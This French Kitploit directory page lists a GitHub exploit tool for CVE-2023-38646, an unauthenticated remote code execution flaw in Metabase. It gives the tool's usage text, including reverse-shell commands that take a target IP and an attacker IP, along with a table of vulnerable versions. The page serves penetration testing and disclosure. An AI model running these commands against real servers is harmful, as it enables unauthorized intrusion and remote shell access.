Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-38646 — Metabase open source avant 0.46.6.1 et Metabase Enterprise avant 1.46.6.1 permettent aux attaquants d'exécuter des commandes arbitraires sur le serveur, avec le niveau de privilège du serveur. L'authentification n'est pas requise pour l'exploitation. Les autres versions corrigées sont 0.45.4.1, 1.45.4.1, 0.44.7.1, 1.44.7.1, 0.43.7.2 et 1.43.7.2. | Kitploit
Outils/GitHubGitHub/ego1stoo/cve-2023-38646
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationOutil d'Accès à Distance
GitHubego1stoo/cve-2023-38646

CVE-2023-38646

Voir le dépôt
13il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →

À propos

Metabase open source avant 0.46.6.1 et Metabase Enterprise avant 1.46.6.1 permettent aux attaquants d'exécuter des commandes arbitraires sur le serveur, avec le niveau de privilège du serveur. L'authentification n'est pas requise pour l'exploitation. Les autres versions corrigées sont 0.45.4.1, 1.45.4.1, 0.44.7.1, 1.44.7.1, 0.43.7.2 et 1.43.7.2.

Partager

CVE-2023-38646 Metabase RCE sans authentification (26/11/2023)

Metabase open source avant 0.46.6.1 et Metabase Enterprise avant 1.46.6.1 permettent aux attaquants d'exécuter des commandes arbitraires sur le serveur, au niveau de privilège du serveur. L'authentification n'est pas requise pour l'exploitation. Les autres versions corrigées sont 0.45.4.1, 1.45.4.1, 0.44.7.1, 1.44.7.1, 0.43.7.2 et 1.43.7.2.

La vulnérabilité réside dans l'application exposant le setup-token qui peut être utilisé pour valider la base de données via api/setup/validate. Un utilisateur non autorisé peut créer un code malveillant et exécuter une commande arbitraire.

Disclaimer

UTILISATION À VOS PROPRES RISQUES

Ce script est fourni à des fins éducatives et de test. L'auteur n'est pas responsable de toute mauvaise utilisation ou des dommages causés par son utilisation. Assurez-vous de respecter les lois applicables et les normes éthiques. En utilisant ce script, vous reconnaissez et acceptez ces conditions.

Metabase

Metabase est un outil de business intelligence open source qui permet de créer des graphiques et des tableaux de bord à partir de données provenant de diverses bases de données et sources de données. C'est un projet populaire, avec plus de 33 000 étoiles sur GitHub, et il a fait l'objet de nombreuses analyses du point de vue de la recherche en vulnérabilités ces dernières années.

Proof of Concept

Commands

root@kitploit:~
usage: CVE-2023-38646.py [-h] -rh REMOTE_HOST [-rp [REMOTE_PORT]] -p PORT -l LOCAL_HOST

options:
  -h, --help            affiche ce message d'aide et quitte
  -rh REMOTE_HOST, --remote-host REMOTE_HOST
                        Nom d'hôte de la cible.
  -rp [REMOTE_PORT], --remote-port [REMOTE_PORT]
                        Port de la machine cible (par défaut : port 80)
  -p PORT, --port PORT  Port pour le reverse shell.
  -l LOCAL_HOST, --local-host LOCAL_HOST
                        Votre adresse IP

Vous pouvez exécuter le script en utilisant la commande ci-dessous. Vous pouvez changer le port distant en utilisant l'option -rp. Le port par défaut est 80.

root@kitploit:~
./CVE-2023-38646.py -rh <Target-IP> -p <revese-shell port> -l <Attacker IP>
root@kitploit:~
python3 CVE-2023-38646.py -rh <Target-IP> -p <revese-shell port> -l <Attacker IP>

image

Versions vulnérables

root@kitploit:~
Metabase Enterprise 1.46 < 1.46.6.1
Metabase Enterprise 1.45 < 1.45.4.1
Metabase Enterprise 1.44 < 1.44.7.1
Metabase Enterprise 1.43 < 1.43.7.2
Metabase open source 0.46 < 0.46.6.1
Metabase open source 0.45 < v0.45.4.1
Metabase open source 0.44 < 0.44.7.1
Metabase open source 0.43 < 0.43.7.2

Références

  • Packet storm security - Exécution de code à distance Metabase
  • Détails NVD CVE-2023-38646
Télécharger l’outil